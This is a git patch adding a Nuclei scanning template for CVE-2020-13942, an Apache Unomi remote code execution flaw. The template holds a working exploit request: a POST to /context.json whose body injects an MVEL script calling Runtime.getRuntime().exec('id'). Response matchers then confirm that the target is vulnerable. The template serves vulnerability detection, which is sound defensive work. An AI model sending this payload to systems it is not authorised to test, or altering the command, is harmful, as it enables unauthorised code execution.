From 05f41079f435069720930507d2808ba0b98ae870 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Thu, 19 Nov 2020 00:47:19 +0700 Subject: [PATCH] :fire: Add CVE-2020-13942 --- cves/CVE-2020-13942.yaml | 60 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 60 insertions(+) create mode 100644 cves/CVE-2020-13942.yaml diff --git a/cves/CVE-2020-13942.yaml b/cves/CVE-2020-13942.yaml new file mode 100644 index 0000000000..afa9926a11 --- /dev/null +++ b/cves/CVE-2020-13942.yaml @@ -0,0 +1,60 @@ +id: cve-2020-13942 + +info: + name: Apache Unomi Remote Code Execution + author: dwisiswant0 + severity: critical + description: | + Remote Code Execution in Apache Unomi. + Apache Unomi allows conditions to use OGNL and MVEL scripting which + offers the possibility to call static Java classes from the JDK + that could execute code with the permission level of the running Java process. + This vulnerability affects all versions of Apache Unomi prior to 1.5.2. Apache Unomi users should upgrade to 1.5.2 or later. + + References: + - https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/ + - https://twitter.com/chybeta/status/1328912309440311297 + +requests: + - method: POST + path: + - "{{BaseURL}}/context.json" + - "{{BaseURL}}:8181/context.json" + headers: + Content-Type: application/json + body: | + { + "filters": [ + { + "id": "nuclei", + "filters": [ + { + "condition": { + "parameterValues": { + "nuclei": "script::Runtime.getRuntime().exec('id')" + }, + "type": "profilePropertyCondition" + } + } + ] + } + ], + "sessionId": "nuclei" + } + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "application/json" + - "context-profile-id" + condition: and + part: header + - type: regex + regex: + - "(profile|session)(Id|Properties|Segments)" + - "[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}" + condition: and + part: body \ No newline at end of file